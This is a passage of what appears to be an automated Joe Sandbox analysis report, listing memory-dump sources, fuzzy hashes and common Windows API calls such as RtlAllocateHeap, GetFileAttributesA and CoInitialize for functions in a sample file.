Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 3cd6be6fb312bb6df6ae2576046b049cb7bf225c746e97287f03be3e37e54b81
Instruction ID: e69ebbc42684c0dd7d9e84376f0f61b65231ee18b25c4664b42c9e90920b9f32
Opcode Fuzzy Hash: 3cd6be6fb312bb6df6ae2576046b049cb7bf225c746e97287f03be3e37e54b81
Instruction Fuzzy Hash: DFE1F571E04654ABCB24BB289D0AB9E7B71FB41724F90429CE415A73C2DB349E819BC3

Function 008FD82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,008FA813,00000001,00000364,00000006,000000FF,?,008FEE3F,?,00000004,00000000,?,?), ref: 008FD870

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: aef80ffb27650c159b7a479cf921b066c90334df168d8626d06967276e10742e
Instruction ID: c7bbd620a7dcbc3645ed64a6421b5fa8c71492135222969f7542c7136ccf9c27
Opcode Fuzzy Hash: aef80ffb27650c159b7a479cf921b066c90334df168d8626d06967276e10742e
Instruction Fuzzy Hash: 60F0B43252532CA6EB212A769C01A7B375BFB417F0B258931EF14EB191DA20DC0085E1

Function 008C87B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,008CDA1D,?,?,?,?), ref: 008C87B9

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5de3714363d47579c837be8ee1b4d626f5a47ca4468707cff6ae1089670ad902
Instruction ID: 9adb05a235d9d6e2cdfaac35b6d85d9b385d69e5cc310ba981b22cfe0f7a8016
Opcode Fuzzy Hash: 5de3714363d47579c837be8ee1b4d626f5a47ca4468707cff6ae1089670ad902
Instruction Fuzzy Hash: 0EC08C28292600A9ED1C06380098EB83365F947BA43F42B8CE074EB1F1EA35D8079610

Function 008C87B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,008CDA1D,?,?,?,?), ref: 008C87B9

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 031cb5e5161c26c61f4c4afc6326348e3bd637b22993c3e4f308159207b91c18
Instruction ID: 6faf1785445c3ad4dd048848f5e9137c9669d3372049cb275de03c648c4d3f52
Opcode Fuzzy Hash: 031cb5e5161c26c61f4c4afc6326348e3bd637b22993c3e4f308159207b91c18
Instruction Fuzzy Hash: 8EC08034151200D5E91C46385058E343225F9037143F01B4CD031DB1F1EB32C403C650

Function 008CB1A0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008CB3C7

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f2a0e368512d14b8f595927e40a32c85a26d37a8a46d087587b7063759c4a651
Instruction ID: 8c9fb0f0689b3de8f654868393cd550e90f08be49b00d6a46a7f077ec3254f10
Opcode Fuzzy Hash: f2a0e368512d14b8f595927e40a32c85a26d37a8a46d087587b7063759c4a651
Instruction Fuzzy Hash: 9AB10470A10268DFEB29CF18C895BDEB7B5FF15304F5081D9E809A7281D775AA88CF91

Function 053708D8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221552321.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5370000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb82b9b01b019b253301dd79bda76bdf73d11b84b2be672bd9cd678b9784c4f9
Instruction ID: 3f94346c0922952eb5a4a80ef2887b4381b62829f289b296f117711458c345bc
Opcode Fuzzy Hash: eb82b9b01b019b253301dd79bda76bdf73d11b84b2be672bd9cd678b9784c4f9
Instruction Fuzzy Hash: 5F116FF784C208BEF166C1415B58AFBAB6FE6837307308426F443D6E53D2D80E495932

Function 05370949 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

